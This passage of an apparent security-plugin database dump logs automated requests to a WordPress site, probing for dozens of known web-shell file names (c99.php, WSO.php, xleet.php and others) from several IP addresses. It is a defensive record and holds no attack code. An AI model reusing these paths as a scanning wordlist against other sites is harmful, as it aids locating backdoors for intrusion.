,55,'TDrCBJdbE2ZpPNK0nXuwgvHx','','19|0|0|0|dailyjolly.co.uk/priv8.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890259.1490,55,'2AcfYQNqwmD0aeb8CRUTvuJt','','19|0|0|0|dailyjolly.co.uk/bb.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890259.4124,55,'ehdXCDNM8Jtcay63LKQEnOIj','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890259.6887,55,'E5t2Bfo7XGjUrL4JN3Q6Dy1u','','19|0|0|0|dailyjolly.co.uk/Lux.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890259.9513,55,'KSBCTq5nLNukAhVdgtWXwx4P','','19|0|0|0|dailyjolly.co.uk/haxor.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890260.2203,55,'kLM9hfPw6GArUxSenvYBi4T7','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890260.4841,55,'VU5e0qFGQ7JwRKfO9Iy4kBsH','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890260.7268,55,'gO0FRmL1IwWGbcDeKMdPoQp4','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890261.0015,55,'jcS8TfkW4F0HLgCJRuKEyr5x','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890261.2321,55,'6wCDquT32hpzk7ZnPH0yt1bQ','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890261.4855,55,'TPapgBHzlI5eiNnExXG6v3ks','','19|0|0|0|dailyjolly.co.uk/xl.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890261.7450,55,'VUDirz2ZdqeNJKalkot0FbxP','','19|0|0|0|dailyjolly.co.uk/symlink.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890262.0897,55,'DbC5rH1ofevx7gdhJsSMuyL6','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890262.3669,55,'pzcYLWlUmjaRgdvPinN9Bxq0','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890262.6382,55,'GZ7S4qnaCifAy8uYWbNpTU0v','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890263.0224,55,'vclwKVEdMyWQa8L1FhJX0tkA','','19|0|0|0|dailyjolly.co.uk/c99.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890263.3162,55,'QgYCtcpEJsoMkF8UA1OPmfb7','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890263.6350,55,'K9cWj2VmyxNTuiaMUs4eJ6qP','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890263.8910,55,'tOdUlo46REhcgDiIQjBq2rvG','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890264.1825,55,'Rukf2edixNSr7q0L3YAGBoTX','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890264.4671,55,'TZpDytigjKXM5sOIwAHd0SlP','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890264.7544,55,'UFudZ8YrnDseMRBbaIN0WKXE','','19|0|0|0|dailyjolly.co.uk/4.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890265.0716,55,'EImJNkjasOvu3G6H0FKwpo9S','','19|0|0|0|dailyjolly.co.uk/5.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890265.3647,55,'8KdubW3oY7IctMFzvJ0GspZQ','','19|0|0|0|dailyjolly.co.uk/6.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890265.6619,55,'bgoeRUF8rXhOwJ7tfmz0LxTd','','19|0|0|0|dailyjolly.co.uk/7.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890265.8872,55,'gS1olVqYMAi4FeRk0JCxQpwt','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890266.1544,55,'H0KqdrXMj2cFS9kptxD746RL','','19|0|0|0|dailyjolly.co.uk/9.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890266.3947,55,'KB8ikx4UNJZjrd13RmFYuv27','','19|0|0|0|dailyjolly.co.uk/10.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890266.6436,55,'1kFIluCPMGOZALVHxJRneW6Y','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890266.8727,55,'v0FRAjXNnkhL4YCoydTO87JM','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890267.1397,55,'Xr6bnGAgfCVetIaEuzZLWc0h','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890267.3614,55,'8KgQrfVCtpz6yF1IURNTE2AZ','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890267.6047,55,'k63ecRMwZbTC9vAEfz1D8X0P','','19|0|0|0|dailyjolly.co.uk/t.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890267.8438,55,'y4OzWEh23JrfsQ08dpCemAiL','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890268.1182,55,'MDUdv2CT64k0NpP9sB7wWmtQ','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890268.3443,55,'menZfQkcd52hXDVYsy8qTOuB','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890268.5696,55,'VTJbv958SwzFjMndqIP6Dktc','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890268.8898,55,'lxteLgPQG0qmhzb8p6KsO1cR','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890269.1577,55,'XGvjYJcmCBKlEAoNqidf8gSP','','19|0|0|0|dailyjolly.co.uk/q.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890269.4036,55,'6nYVQNwTdhKf98qRFse7A4xc','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890269.6474,55,'bsC6DEadS1IzhnHeUA4KvBtY','','19|0|0|0|dailyjolly.co.uk/d.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890270.1426,55,'1ejbBRuE2k7QM4gvPHty3DaA','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890270.4257,55,'1iUD7mzrhxecOYZ85tfMLP9w','','19|0|0|0|dailyjolly.co.uk/g.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890270.6850,55,'rdAOHL4BuUQI631EzFT5J0nS','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890270.9527,55,'HJSmoAiYbWFhDr2TQORlBMUP','','19|0|0|0|dailyjolly.co.uk/j.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890271.2437,55,'wYHrpojmWXJyRV1NsEqk8bcB','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890271.4753,55,'sE7vGIn9B60Wc2ObZVX1L84r','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890271.7242,55,'WjDU75Tyi0wHdVA4GCceZXpk','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890271.9624,55,'8vlKfA3oPhIUe2NMc7RpbOrs','','19|0|0|0|dailyjolly.co.uk/v.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890272.2423,55,'8e0a7nNjDxioYwJ5Zhd4H1Qs','','19|0|0|0|dailyjolly.co.uk/n.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890272.5334,55,'R5K63fyxNYhJ0Xc2ADeUlCiS','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890272.7863,55,'N7fQFhRL51yK9lPOpaouwgUk','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890273.0468,55,'SgVDUY450xp6jNObzLtuQvA9','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890273.3110,55,'YzdqWa7bnmhIkVCiMFoLGR6g','','19|0|0|0|dailyjolly.co.uk/minimo.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890274.1417,55,'6yCi2DofxUENTGZbctI9ORJ4','','19|0|0|0|dailyjolly.co.uk/V3.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890274.4401,55,'conM4GyAd7ZYaHiuCl0q3LSx','','19|0|0|0|dailyjolly.co.uk/V5.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890274.6744,55,'RkuZUSzyV3dTMnm74gFjpisC','','19|0|0|0|dailyjolly.co.uk/www.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890274.9068,55,'Or1haudNP3zkxvLAo6XBVe9y','','19|0|0|0|dailyjolly.co.uk/100.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890275.1643,55,'B2f7JKbwTleiVEdckFZ05xgM','','19|0|0|0|dailyjolly.co.uk/777.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890275.4046,55,'lkgvQEoDWNXyxMHjfwaiFTOK','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890275.6829,55,'6zvp5BPA2KqIUQbunVerHxCm','','19|0|0|0|dailyjolly.co.uk/xox.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890275.9286,55,'zmU4DkPFX5BT6rlancMyv38i','','19|0|0|0|dailyjolly.co.uk/wi.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890276.1797,55,'OVgUis2hrxPfQ6THtDAEKqpl','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890276.4703,55,'W2fkMetCp904DBNlY7uiKadb','','19|0|0|0|dailyjolly.co.uk/root.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890276.7374,55,'EAJVSxuP8tDNFRKmQ03BCoIO','','19|0|0|0|dailyjolly.co.uk/nee.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890276.9852,55,'1ecnbBXhUYmD59W6g28Tav0r','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890277.2237,55,'Enoyvqp0dZTQ1jYHM5Gbk4cf','','19|0|0|0|dailyjolly.co.uk/lol.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890277.4631,55,'6m4fQI7ctTaN0bELSHqRPXol','','19|0|0|0|dailyjolly.co.uk/87.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890277.8288,55,'4dtmG7wC80plge3hQs9OIFUK','','19|0|0|0|dailyjolly.co.uk/7yn.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890278.1891,55,'be8zjh2OPGprU5QmivYfRn9k','','19|0|0|0|dailyjolly.co.uk/13.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890278.5148,55,'moVsxRtTgMHi75ukBO9KCyvP','','19|0|0|0|dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890278.8129,55,'p3ORWDhHiANfwCPI6xQbkd0j','','19|0|0|0|dailyjolly.co.uk/alf.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890279.0972,55,'uLerhn6kYGqCP72abiJKd3to','','19|0|0|0|dailyjolly.co.uk/WSO.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890279.3722,55,'iPTSNJGbQxgtZweaFY0UrjV8','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890279.7018,55,'GOtNoqKmWUcbJ8rEYgnwP4kD','','19|0|0|0|dailyjolly.co.uk/if.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890279.9597,55,'wOEFDIlAnLbyM3Vqoi2TW9Pj','','19|0|0|0|dailyjolly.co.uk/kk.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890280.1977,55,'Xi1WpSs3COM4KVnHLQuzk509','','19|0|0|0|dailyjolly.co.uk/mrjn.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890280.4648,55,'IDsJX81GUtbTmcHegPw0AqFN','','19|0|0|0|dailyjolly.co.uk/kn.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890280.7422,55,'cHKQqhvue9DB8EpGOSPzsJmx','','19|0|0|0|dailyjolly.co.uk/3301.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890281.0284,55,'x1HlGb6vyV0wfgdLC8ZqsXKz','','19|0|0|0|dailyjolly.co.uk/anone.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890281.3324,55,'yqf4BesUMt0mPDJrVCjxoYiO','','19|0|0|0|dailyjolly.co.uk/wp-configer.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890282.4019,55,'5JMpU3Bngr2j7YftDFcWLoOz','','19|0|0|0|dailyjolly.co.uk/wp-ad.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890282.7458,55,'EJBeLojgX0Y9NiI73mc8FwG6','','19|0|0|0|dailyjolly.co.uk/.wp-cache.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890283.0062,55,'1cdFgbekv8DSLNmpOqKj6WEr','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890283.2598,55,'wzpQiCSBR7f6sq8OFNtMDXTE','','19|0|0|0|dailyjolly.co.uk/rahma.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890283.5468,55,'pgmCIt3ohTfxvjYP7RW6crQL','','19|0|0|0|dailyjolly.co.uk/nasgor.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890283.8193,55,'CfX2nP93hM4HJu6T1j0KotBO','','19|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890284.0688,55,'T2LfnFCgckiMox8zdRONaG1X','','19|0|0|0|dailyjolly.co.uk/alfa123.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890284.3974,55,'TtgCAqLWVGeu2r5yjmpxfcIU','','19|0|0|0|dailyjolly.co.uk/upload.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890284.6853,55,'rUY5CbdQPJTSGzM8ek9jgmFy','','19|0|0|0|dailyjolly.co.uk/bypass.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890284.9231,55,'d4vBimjlw2NoYManTkURpFZt','','19|0|0|0|dailyjolly.co.uk/wp-one.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890285.2005,55,'DHvO3F9e1iwEt0sjxXSZgGJu','','19|0|0|0|dailyjolly.co.uk/alexus.php',0,19,0),('196.118.14.220',3296071388,'',0,1673890285.6811,55,'xiOv8tZ4hD9GJnVSsze5al1o','','19|0|0|0|dailyjolly.co.uk/wso1337.php',0,19,0),('45.248.151.22',771266326,'',0,1673894030.5264,55,'7nqIPfJH3mzhsuxtGUjVLD4v','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('45.248.151.22',771266326,'',0,1673894032.6062,55,'crUebp0C7f81AaSZIJsH2n5d','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('45.248.151.22',771266326,'',0,1673894038.8790,55,'kyP37iOeh926QHAsVc5X4ZdI','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('45.248.151.22',771266326,'',0,1673894040.8265,55,'iNExgA4FuKRLbwl9UvC1ySGj','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,19,0),('45.248.151.22',771266326,'',0,1673894041.7406,55,'v5tqpaOo8GnXkCuKFysUYD9P','','19|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,19,0),('45.248.151.22',771266326,'',0,1673894041.8511,10,'v5tqpaOo8GnXkCuKFysUYD9P','','707|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,707,0),('45.248.151.22',771266326,'',0,1673894043.0516,100,'O7cGp8uXdhL21CzTPnN6R3if','','13|0|0|0|www.dailyjolly.co.uk/wp/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673894044.2235,100,'PT8jN9tyqwk3ZcEBSI0QJOH4','','13|0|0|0|www.dailyjolly.co.uk/wordpress/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673894045.0684,100,'QYIgoLpKwq6eG8rTZEzjk1xl','','13|0|0|0|www.dailyjolly.co.uk/blog/wp-commentin.php',0,13,0),('45.248.151.22',771266326,'',0,1673894045.7672,100,'XiV20O3xcRBYWMHJtU8s67h1','','13|0|0|0|www.dailyjolly.co.uk/site/wp-commentin.php',0,13,0),('20.244.36.78',351544398,'',0,1673894131.1472,55,'056fCayXPuN9rGDVql3LinOU','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1673894134.6168,55,'0Fye9lRzVhWNjn23pcrI1Hxg','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.244.36.78',351544398,'',0,1673894135.7976,55,'MlfXFHjdgCADsWqcxnvw13Tu','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.244.36.78',351544398,'',0,1673894140.0258,55,'dEpeFcgYzWCqsiK67nPZwkoJ','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.244.36.78',351544398,'',0,1673894140.4869,55,'y0QPmvtNIgCKWk8FUzZADMHX','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.244.36.78',351544398,'',0,1673894140.5992,10,'y0QPmvtNIgCKWk8FUzZADMHX','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.244.36.78',351544398,'',0,1673894142.8626,55,'SL0cJ7eylsOIQgv2zwZPoaKB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.244.36.78',351544398,'',0,1673894144.0861,55,'mEVA0naH5dpT3uI24qGwzlFr','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.244.36.78',351544398,'',0,1673894144.5656,55,'IJNmQngCHbOG5vFzdRkBqxPw','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.244.36.78',351544398,'',0,1673894145.7279,55,'WlgMi2dN8GO61zfkZVSeIm35','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1673894146.7833,55,'SXwFlxNYjGkoItmhMndZuA1R','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.244.36.78',351544398,'',0,1673894156.2392,100,'D5EWq1tzYOjUiJunwCg0ZLlP','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.244.36.78',351544398,'',0,1673894162.7416,55,'D3BeJudfL2SAkZvq96XYipFP','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.244.36.78',351544398,'',0,1673894163.8259,55,'ZrvPOBKx4ceLVzRlXHnAbgf9','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('4.233.59.82',82393938,'',0,1673894527.0404,55,'Qow2xWcAq8JpMhUijBzIklO0','','19|0|0|0|www.dailyjolly.co.uk/.sts.php',0,19,0),('4.233.59.82',82393938,'',0,1673894597.7414,55,'qGUCRmxHajrJhb2vi50N97Yo','','19|0|0|0|www.dailyjolly.co.uk/.Wp-back.phP',0,19,0),('4.233.59.82',82393938,'',0,1673894841.7121,55,'3a2fw9ZRoGIqgvDrb4AVOnyk','','19|0|0|0|www.dailyjolly.co.uk/fx.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894855.1947,55,'ci6B5uxtv7S2wNWQog8yqpGO','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894858.7417,55,'jaM8Z4A0kYedqiPOyu7fIQcU','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/versions.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894859.8254,55,'uGQXYlJevdiRxBmNrnoPcqEC','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/assets/load.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894860.9185,55,'s3j2rXSUP7ZMonTgzRCwQEBh','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894863.2802,55,'ZQhwvt0aKAEW6xr9RHSijd5F','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,19,0),('101.34.223.139',1696784267,'',0,1673894863.3018,10,'ZQhwvt0aKAEW6xr9RHSijd5F','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,707,0),('101.34.223.139',1696784267,'',0,1673894864.7409,55,'GnkM9BjNq1cmJFSfZEUh0QWH','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php',0,19,0),('4.233.59.82',82393938,'',0,1673894893.5542,55,'SxkEp71Zt6FDHdPLghuNfvUT','','19|0|0|0|www.dailyjolly.co.uk/.ae.php',0,19,0),('4.233.59.82',82393938,'',0,1673894931.3492,55,'1h3eL5IPvV92GWMaUXKoyRCb','','19|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,19,0),('4.233.59.82',82393938,'',0,1673894931.3654,10,'1h3eL5IPvV92GWMaUXKoyRCb','','707|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,707,0),('4.233.59.82',82393938,'',0,1673895010.0440,55,'tX2Nk6Ssl9pWL3qvmJ5MDKaR','','19|0|0|0|www.dailyjolly.co.uk/wso112233.php',0,19,0),('4.233.59.82',82393938,'',0,1673895096.1311,55,'8sYruSyj9LhgPabBAqE2WvHw','','19|0|0|0|www.dailyjolly.co.uk/bala.php',0,19,0),('4.233.59.82',82393938,'',0,1673895149.5442,55,'p4HVNubBT8rtglnyGoEewDXi','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('4.233.59.82',82393938,'',0,1673895230.5465,55,'1SE3O4DunUY9slifFIHM6pTg','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('4.233.59.82',82393938,'',0,1673895308.7451,55,'mdjOgKc2xfpvR1biU5YPHStX','','19|0|0|0|www.dailyjolly.co.uk/wp-class.php',0,19,0),('4.233.59.82',82393938,'',0,1673895359.1230,55,'z53lpiUTkNwC2Z94KGYXcgad','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('4.233.59.82',82393938,'',0,1673895440.0297,55,'Z5h3YAoqO0l2aQRWF7ye6DVb','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('4.233.59.82',82393938,'',0,1673895526.2574,55,'yLcIMVlAUOjwPC7BKEu6mq5h','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('4.233.59.82',82393938,'',0,1673895566.2487,55,'0UaqXOmNP9ibRpQTjHV6xvu1','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('4.233.59.82',82393938,'',0,1673895642.7518,55,'aDd74hW9C26Pu1GwqJYytxFg','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('4.233.59.82',82393938,'',0,1673895728.2163,55,'RBOdAXNwc4fxEIa0ZFuzGnT8','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('4.233.59.82',82393938,'',0,1673895815.4007,55,'PF1ZaXS4xqfLHt9YmlcTQeVJ','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('4.233.59.82',82393938,'',0,1673895958.2459,55,'iNrzj6tUASHa8VY41QRGebhT','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('4.233.59.82',82393938,'',0,1673896095.9060,55,'JcWx4d21Gi3qB09jSAgFKrEP','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('4.233.59.82',82393938,'',0,1673896147.4905,55,'9HZPqWjebLwAQdN5GFJ83oaR','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('4.233.59.82',82393938,'',0,1673896213.3456,55,'6KWdBmniQNclxHjYF801pMRL','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('4.233.59.82',82393938,'',0,1673896265.5796,55,'XNsMWHDJIEQ32pjT15Aainlb','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.51.247.40',338949928,'',0,1673896376.5943,55,'m0j4sTHLkrziCecObtpWVDIE','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('20.51.247.40',338949928,'',0,1673896396.0352,55,'oFaVDnkJr1pAOyW8BcujPNQb','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('20.51.247.40',338949928,'',0,1673896413.5616,55,'gvD3IdSAeVxfmUTPtrQ8owG5','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('20.51.247.40',338949928,'',0,1673896431.9104,55,'pD4THFEP6j2kNSr1ntYW85UO','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('20.51.247.40',338949928,'',0,1673896447.7898,55,'tk5I4wd8A1GnquB3LCgQjOVv','','19|0|0|0|dailyjolly.co.uk/t.php',0,19,0),('20.51.247.40',338949928,'',0,1673896447.8263,10,'tk5I4wd8A1GnquB3LCgQjOVv','','707|0|0|0|dailyjolly.co.uk/t.php',0,707,0),('20.51.247.40',338949928,'',0,1673896465.9541,55,'wS5Xg3OoufZ6kWAtd4aryz17','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('20.51.247.40',338949928,'',0,1673896484.6170,55,'LfY0o2iMBk9K3SleQmp4ny1v','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('20.51.247.40',338949928,'',0,1673896500.4270,55,'NVzh4BR5arn2S6xDJTQyYdiL','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('20.51.247.40',338949928,'',0,1673896523.8461,55,'5fkah4KH0c3l6O1UWQZyRbtu','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('20.51.247.40',338949928,'',0,1673896542.9639,55,'dPOzq7VUDa2Zkn4CLSKTlMmA','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('20.51.247.40',338949928,'',0,1673896558.4152,55,'GKkhBYyEmso2MWTQ16VIDtHX','','19|0|0|0|dailyjolly.co.uk/q.php',0,19,0),('20.51.247.40',338949928,'',0,1673896575.0379,55,'CgyocTqilK4WHbO0dFuN79pt','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('20.51.247.40',338949928,'',0,1673896592.8557,55,'XRgt8x4SldhBDTyosCpnqMkw','','19|0|0|0|dailyjolly.co.uk/d.php',0,19,0),('20.51.247.40',338949928,'',0,1673896608.5351,55,'Ui7AxJ0qmbDcW5SYzsgQhyj9','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('20.51.247.40',338949928,'',0,1673896624.7169,55,'zYehIGQ4Z2knUajTltiLCuN1','','19|0|0|0|dailyjolly.co.uk/g.php',0,19,0),('20.51.247.40',338949928,'',0,1673896642.1442,55,'O3c7Mv9UG0SrN2yq8ChQJlLx','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('20.51.247.40',338949928,'',0,1673896675.4025,55,'Qt2cHFB0z3msf1hCeX4vSOPa','','19|0|0|0|dailyjolly.co.uk/j.php',0,19,0),('20.51.247.40',338949928,'',0,1673896696.9970,55,'n7EhkleXmgKwNsUIPyBu58aS','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('20.51.247.40',338949928,'',0,1673896714.7400,55,'BHsTqeWYydh0i1kXbUPO5fgI','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('20.51.247.40',338949928,'',0,1673896728.0595,55,'JT6VS8BEqO0nd5gtlybXhN4U','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('20.51.247.40',338949928,'',0,1673896741.1445,55,'F28e7vrxkLUYBnWHVm0I5JQp','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('20.51.247.40',338949928,'',0,1673896754.3092,55,'OidKJjHgvZGQaryotARqbFnN','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('20.51.247.40',338949928,'',0,1673896767.8428,55,'pMeIxTlsuioVWZK1wAc5DCyb','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('20.51.247.40',338949928,'',0,1673896781.1801,55,'HtKGJ5SEnvBoDfkhzi98uFOP','','19|0|0|0|dailyjolly.co.uk/v.php',0,19,0),('20.51.247.40',338949928,'',0,1673896796.1263,55,'pWbHmkNRVzedMUaiIJFw2Avx','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('20.51.247.40',338949928,'',0,1673896821.0939,55,'sW4TjBob1qpUZIg7ex8zMRwk','','1